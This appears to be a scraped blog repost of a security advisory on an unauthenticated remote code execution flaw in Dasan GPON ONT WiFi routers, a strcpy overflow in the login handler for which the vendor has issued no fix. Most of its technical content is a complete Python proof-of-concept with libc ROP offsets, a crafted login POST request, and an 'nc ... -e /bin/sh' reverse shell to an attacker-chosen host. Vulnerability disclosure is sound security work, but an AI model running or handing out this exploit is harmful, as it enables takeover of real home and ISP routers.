{"id":10742,"date":"2017-12-06T14:19:25","date_gmt":"2017-12-06T22:19:25","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/12\/06\/news-4514\/"},"modified":"2017-12-06T14:19:25","modified_gmt":"2017-12-06T22:19:25","slug":"news-4514","status":"publish","type":"post","link":"https:\/\/www.palada.net\/index.php\/2017\/12\/06\/news-4514\/","title":{"rendered":"SSD Advisory \u2013 Dasan Unauthenticated Remote Code Execution"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Wed, 06 Dec 2017 06:42:29 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:sxsxd@bxexyxoxnxdxsxexcxuxrxixtxy.com\" onmouseover=\"this.href=this.href.replace(\/x\/g,'');\" id=\"a-href-3552\">sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom<\/a><br \/><script>var obj = jQuery('#a-href-3552');if(obj[0]) { obj[0].innerText = obj[0].innerText.replace(\/x\/g, ''); }<\/script> See our full scope at: <a href=\"https:\/\/blogs.securiteam.com\/index.php\/product_scope\">https:\/\/blogs.securiteam.com\/index.php\/product_scope<\/a><\/p>\n<div class=\"pf-content\">\n<p><strong>Vulnerability Summary<\/strong><br \/> The following advisory describes a buffer overflow that leads to remote code execution found in Dasan Networks GPON ONT WiFi Router H640X versions 12.02-01121 \/ 2.77p1-1124 \/ 3.03p2-1146 <\/p>\n<p>Dasan Networks GPON ONT WiFi Router &#8220;is indoor type ONT dedicated for FTTH (Fibre to the Home) or FTTP (Fiber to the Premises) deployments. That can work as simple Bridge or behave as Router\/NAT. It\u2019s cost-effective CPE that meets carrier-class requirement for Telcom industry and guarantee reliable service proven in the field.&#8221;<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher, TigerPuma (at) Fosec.vn, has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program<\/p>\n<p><strong>Vendor response<\/strong><br \/> We tried to contact Dasan since October 8 2017, repeated attempts to establish contact went unanswered. At this time there is no solution or workaround for this vulnerability.<br \/> <span id=\"more-3552\"><\/span><br \/> <strong>Vulnerability details<\/strong><br \/> All cgi in Dasan web service are symbolic link of cgipage.cgi, and when client request, lighttpd will invoke the corresponding path.<\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/12\/dasan_1.jpg\" data-slb-active=\"1\" data-slb-asset=\"1687578917\" data-slb-internal=\"0\" data-slb-group=\"3552\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/12\/dasan_1-300x198.jpg\" alt=\"\" width=\"300\" height=\"198\" class=\"alignnone size-medium wp-image-3553\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/12\/dasan_1-300x198.jpg 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/12\/dasan_1.jpg 624w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>The buffer overflow vulnerability found in function <em>login_action<\/em> which handler login request.<\/p>\n<p>The function uses <em>strcpy<\/em> without check length of input from client request.<\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/12\/dasan_2.jpg\" data-slb-active=\"1\" data-slb-asset=\"2083758082\" data-slb-internal=\"0\" data-slb-group=\"3552\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/12\/dasan_2-300x129.jpg\" alt=\"\" width=\"300\" height=\"129\" class=\"alignnone size-medium wp-image-3554\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/12\/dasan_2-300x129.jpg 300w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/12\/dasan_2.jpg 624w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>If we will look at the stack, we can see that we can trigger the buffer overflow and in the end to control the pc.<\/p>\n<p><a href=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/12\/dasan_3.jpg\" data-slb-active=\"1\" data-slb-asset=\"1083564434\" data-slb-internal=\"0\" data-slb-group=\"3552\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/12\/dasan_3-221x300.jpg\" alt=\"\" width=\"221\" height=\"300\" class=\"alignnone size-medium wp-image-3555\" srcset=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/12\/dasan_3-221x300.jpg 221w, https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/12\/dasan_3.jpg 623w\" sizes=\"auto, (max-width: 221px) 100vw, 221px\" \/><\/a><\/p>\n<p><strong>Proof of Concept<\/strong><\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a286cecc9b2f121379468\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> import sys  import socket  import json  import time  import struct  import ssl    if len(sys.argv) != 4:      print &#8220;Use: {} ip port connectback&#8221;.format(sys.argv[0])      sys.exit(1)    host = str(sys.argv[1])  port = int(sys.argv[2])    connectback = str(sys.argv[3])    buf = 1024  sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  #sock.settimeout(10)    clientsocket = ssl.wrap_socket(sock)  #clientsocket = sock  clientsocket.connect((host, port))    addr_libc = 0x2ad0c000 # 0x2ad0e000 with H640DW    # rop1  rop1 = addr_libc + 0x00115d40       #addiu $a0,$sp,0x18 |  jalr  $s0  addr_rop1 = struct.pack(&#8220;&gt;i&#8221;,rop1)  #rop2  system = addr_libc + 0x0003CC9C     #system  addr_system =  struct.pack(&#8220;&gt;i&#8221;,system)    # execute command  command = &#8220;nc &#8221; + connectback + &#8221; -e \/bin\/sh;&#8221;    payload = &#8220;A&#8221;*(756 &#8211; 0x28) + addr_system + &#8216;C&#8217;*(0x28-8) + addr_rop1 + &#8216;;&#8217;*24 + command    data = &#8220;action={}&amp;txtUserId=a&amp;button=Login&amp;txtPassword=a&amp;sle_Language=englishrn&#8221;.format(payload)    http_payload = &#8220;&#8221;&#8221;POST \/cgi-bin\/login_action.cgi HTTP\/1.1rnHost: 192.168.1.100:8080rnUser-Agent: Mozilla\/5.0rnAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8rnAccept-Language: en-US,en;q=0.5rnAccept-Encoding: gzip, deflaternReferer: https:\/\/192.168.1.100:8080\/cgi-bin\/login.cgirnConnection: keep-alivernContent-Type: application\/x-www-form-urlencodedrnContent-Length: {}rnrn{}&#8221;&#8221;&#8221;.format(len(data),data)    print http_payload    clientsocket.send(http_payload)    respond_raw = clientsocket.recv(buf).strip()    print respond_raw    respond_raw = clientsocket.recv(buf).strip()    print respond_raw  respond_raw = clientsocket.recv(buf).strip()    print respond_raw    clientsocket.close()<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0046 seconds] -->  <\/p>\n<div class=\"printfriendly pf-alignleft\"><a href=\"#\" rel=\"nofollow\" onclick=\"window.print(); return false;\" class=\"noslimstat\" title=\"Printer Friendly, PDF &#038; Email\"><img decoding=\"async\" style=\"border:none;-webkit-box-shadow:none; box-shadow:none;\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\" alt=\"Print Friendly, PDF &#038; Email\" \/><\/a><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3552\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/12\/dasan_1-300x198.jpg\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Wed, 06 Dec 2017 06:42:29 +0000<\/strong><\/p>\n<p>Vulnerability Summary The following advisory describes a buffer overflow that leads to remote code execution found in Dasan Networks GPON ONT WiFi Router H640X versions 12.02-01121 \/ 2.77p1-1124 \/ 3.03p2-1146 Dasan Networks GPON ONT WiFi Router &#8220;is indoor type ONT dedicated for FTTH (Fibre to the Home) or FTTP (Fiber to the Premises) deployments. That &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3552\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 Dasan Unauthenticated Remote Code Execution<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[12033,11682,10757,12136],"class_list":["post-10742","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-buffer-overflow","tag-remote-code-execution","tag-securiteam-secure-disclosure","tag-unauthenticated-action"],"_links":{"self":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/10742","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=10742"}],"version-history":[{"count":0,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/10742\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=10742"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=10742"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=10742"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}